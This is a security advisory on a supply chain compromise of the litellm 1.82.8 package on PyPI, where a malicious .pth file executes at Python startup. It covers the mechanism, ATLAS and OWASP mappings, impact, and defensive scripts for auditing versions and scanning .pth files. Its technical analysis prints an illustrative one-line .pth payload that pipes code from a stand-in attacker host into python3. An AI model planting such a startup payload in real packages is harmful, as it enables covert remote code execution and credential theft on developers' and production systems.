Overview
A confirmed supply chain compromise has been identified in litellm version 1.82.8, published to the Python Package Index (PyPI). Litellm is a widely adopted open-source library that provides a unified interface for calling APIs across dozens of large language model providers including OpenAI, Anthropic, Cohere, and others. Its prevalence in LLM-powered applications, AI agents, and developer tooling makes this compromise particularly significant. The malicious payload was embedded in a .pth file that Python automatically executes at interpreter startup — requiring no explicit import of the library by the victim.
Technical Analysis
The attack vector exploits a largely underappreciated Python behaviour: .pth files placed in site-packages directories are processed by the site module on every interpreter startup, and any line in a .pth file that begins with "import" is executed as Python code. The malicious file, litellm_init.pth (34,628 bytes), was bundled inside the wheel distribution and would execute its payload silently regardless of whether the developer ever called import litellm.
# Illustrative single-line .pth payload: site.py executes any .pth line
# beginning with "import", so this runs at every interpreter startup
import os; os.system('curl -s http://attacker.example/payload | python3')
This technique allows an attacker to achieve persistent code execution across any Python environment where the package is installed — including CI/CD pipelines, developer workstations, and production inference servers. The size of the payload (34 KB) suggests non-trivial malicious functionality, potentially including credential harvesting, reverse shells, or API key exfiltration targeting LLM provider credentials stored in environment variables.
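To illustrate the exposure, the sketch below enumerates environment variables that look like credentials, which is roughly what a startup-time payload could harvest from a typical LLM development shell. The marker list is a hypothetical illustration, not taken from the actual payload.

```python
import os

# Common substrings of credential-bearing environment variable names
# (illustrative assumption; the real payload's targeting is unknown)
SENSITIVE_MARKERS = ("API_KEY", "SECRET", "TOKEN")

def exposed_credentials(environ=os.environ):
    """Return names of environment variables that look like credentials."""
    return sorted(
        name for name in environ
        if any(marker in name.upper() for marker in SENSITIVE_MARKERS)
    )

if __name__ == "__main__":
    # In an LLM dev shell this might list OPENAI_API_KEY, ANTHROPIC_API_KEY, etc.
    print(exposed_credentials())
```

Running this in an affected environment gives defenders a concrete list of secrets to rotate.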
Framework Mapping
MITRE ATLAS:
- AML.T0010 – ML Supply Chain Compromise: The core technique. An adversary tampered with a published ML-adjacent software package to introduce malicious code.
- AML.T0018 – Backdoor ML Model: While not directly targeting model weights, the compromise of litellm could facilitate persistent access to LLM inference pipelines.
- AML.T0047 – ML-Enabled Product or Service: Litellm underpins a wide range of LLM-enabled products, amplifying the blast radius of this attack.
OWASP LLM Top 10:
- LLM05 – Supply Chain Vulnerabilities: A textbook example of third-party package compromise affecting the LLM application ecosystem.
- LLM06 – Sensitive Information Disclosure: LLM API keys, model configurations, and inference data are at risk of exfiltration through the injected payload.
Impact Assessment
Any organisation or developer who installed litellm==1.82.8 is potentially compromised. The affected population includes AI startups, enterprise LLM application teams, and open-source project maintainers. Environments storing LLM provider API keys (OpenAI, Anthropic, etc.) in environment variables are at elevated risk of credential theft. CI/CD pipelines that install packages from PyPI without hash pinning or integrity verification are also exposed.
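A quick way to audit a single environment is to check the installed package version with the standard library. This is a minimal sketch of that check; the version string is the one named in this advisory.

```python
from importlib.metadata import PackageNotFoundError, version

# Package and version flagged in this advisory
COMPROMISED = {"litellm": "1.82.8"}

def is_affected(package, bad_version):
    """Return True if the compromised version is installed in this environment."""
    try:
        return version(package) == bad_version
    except PackageNotFoundError:
        return False

if __name__ == "__main__":
    for pkg, bad in COMPROMISED.items():
        if is_affected(pkg, bad):
            print(f"ALERT: {pkg}=={bad} is installed -- remove and rotate credentials")
```

Run the same check inside each virtualenv, container image, and CI runner, since each has its own site-packages.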
Mitigation & Recommendations
- Audit installations: Check all environments for litellm==1.82.8 and remove immediately. Upgrade to a verified clean version.
- Rotate API keys: Any LLM provider credentials present in affected environments should be considered compromised and rotated without delay.
- Implement SBOM tracking: Maintain a Software Bill of Materials for all Python dependencies to accelerate detection of future compromises.
- Adopt SLSA and Sigstore: Enforce provenance verification on PyPI packages using Sigstore signatures and SLSA attestations where available.
- Pin dependencies with hash verification: Use pip install --require-hashes, or tools like pip-audit and pipenv with lock files, to detect integrity violations.
- Scan for .pth files: Audit site-packages directories for unexpected .pth files as a post-incident detection measure.
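The .pth audit can be sketched as a short script that flags any .pth file containing a code-executing line (one beginning with "import", the mechanism abused here). Findings require manual review, since some legitimate tooling (e.g. virtualenv) also ships import-style .pth files.

```python
import site
from pathlib import Path

def suspicious_pth_files():
    """List .pth files in site-packages that execute code at interpreter startup."""
    findings = []
    search_dirs = site.getsitepackages() + [site.getusersitepackages()]
    for sp in search_dirs:
        for pth in Path(sp).glob("*.pth"):
            try:
                lines = pth.read_text(errors="replace").splitlines()
            except OSError:
                continue
            # site.py executes any .pth line starting with 'import ' or 'import\t'
            if any(line.startswith(("import ", "import\t")) for line in lines):
                findings.append(pth)
    return findings

if __name__ == "__main__":
    for path in suspicious_pth_files():
        print(f"review: {path}")
```

Each flagged file should be diffed against the package that installed it; a 34 KB .pth file, as seen in this incident, is a strong anomaly signal on size alone.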